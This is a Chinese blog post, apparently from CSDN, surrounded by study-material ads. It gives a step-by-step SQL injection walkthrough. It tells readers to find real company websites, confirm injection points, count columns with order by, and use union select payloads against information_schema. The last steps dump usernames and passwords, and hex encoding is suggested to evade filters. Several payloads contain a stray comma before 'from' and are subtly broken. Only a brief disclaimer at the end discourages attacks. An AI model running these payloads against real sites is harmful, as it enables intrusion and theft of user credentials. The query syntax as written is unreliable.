渗透测试之sql注入验证安全与攻击性能

2024软件测试面试刷题，这个小程序（永久刷题），靠它快速找到工作了！（刷题APP的天花板）-CSDN博客文章浏览阅读2.3k次，点赞85次，收藏11次。你知不知道有这么一个软件测试面试的刷题小程序。里面包含了面试常问的软件测试基础题，web自动化测试、app自动化测试、接口测试、性能测试、自动化测试、安全测试及一些常问到的人力资源题目。最主要的是他还收集了像阿里、华为这样的大厂面试真题，还有互动交流板块……https://blog.csdn.net/AI_Green/article/details/134931243?spm=1001.2014.3001.5502

由于渗透测试牵涉到安全性以及攻击性，为了便于交流分享，本人这里不进行具体网址的透露了。

我们可以在网上查找一些公司官方网站如（http://www.XXXXXX.com/xxxx?id=1）

1、拿到网页后进行查找注入点；

1、通过单引号 ' ; 在 url 后面输入单引号进行回车（如果报错可能存在sql注入为：10%左右）

2、利用逻辑运算（在 url 后面 输入 and 1=1 正常；1=2不正常，sql 注入漏洞概率为：40-60%左右）

3、利用沉睡函数俗称摸鱼函数（在 url 后面输入sleep(10),网页会休眠停留10s ,休眠与网速有关所以sql 注入漏洞概率为：50%左右）

4、利用运算进行测试（eg:id=1 则可以修改为id=2-1或3-2 ，+-×÷都能够进行计算并跑通，sql 注入漏洞概率为：95-100%左右）

2、进行测试报字段通过（order by函数）；我的字段是9

在url后面加上order by XXX（整数) 利用XXX多次进行寻找临界值（报错与不报错边缘）

3、通过寻找到的字段后进行联合查询；

URL + union select 1,2,3,4,5,6,7,8,9(会出现字段序号对应的位置，1不要变因为通常第一位是序号，后面数字只是占位置可以改变)

4、查询数据库名；

URL + union select 1,2,database(),4,5,6,7,8,9(database(),所占位置当然也是可以改变的的，不要占用1，就行)

5、查询数据库版本号；

URL + union select 1,2,3,4,version(),6,7,8,9 (version(),所占位置当然也是可以改变的的，不要占用1，就行)

查询数据库版本的目的是因为一旦mysql版本大于5.0必然会有默认库information，如下：

我们通常使用的默认库是：information_schema

6、查询数据库中的表名；

URL + union select 1,2,3,4,group_concat(table_name),6,7,8,9,from information_schema.tables where table_schema=database() 可以查出所有表的表名

7、直接爆出表中用户；

URL + union select 1,2,3,4,group_concat(column_name),6,7,8,9,from information_schema.columns where table_name='表名'

注:有时候开发很聪明会对代码进行特殊字符进行过滤，那么我们就需要进行绕过去，我们可以对’表名‘进行转换为16进制或别的都行然后再进行输入查询

8、查看表中所有信息内容；

URL + union select 1,2,3,4,group_concat(usename,0x7e,password),6,7,8,9,from 表名
则可以查出所有用户具体信息

PS:
我这里如何破解后台网址以及登录就不再详细演示了（注意密码可能需要进行尝试解密）
提倡网络安全，切勿在法律边缘游走，不要随意攻击别人网站

行动吧，在路上总比一直观望的要好，未来的你肯定会感谢现在拼搏的自己！如果想学习提升找不到资料，没人答疑解惑时，请及时加入群： 786229024，里面有各种测试开发资料和技术可以一起交流哦。

最后： 下方这份完整的软件测试视频教程已经整理上传完成，需要的朋友们可以自行领取【保证100%免费】
软件测试面试文档
我们学习必然是为了找到高薪的工作，下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料，并且有字节大佬给出了权威的解答，刷完这一套面试资料相信大家都能找到满意的工作。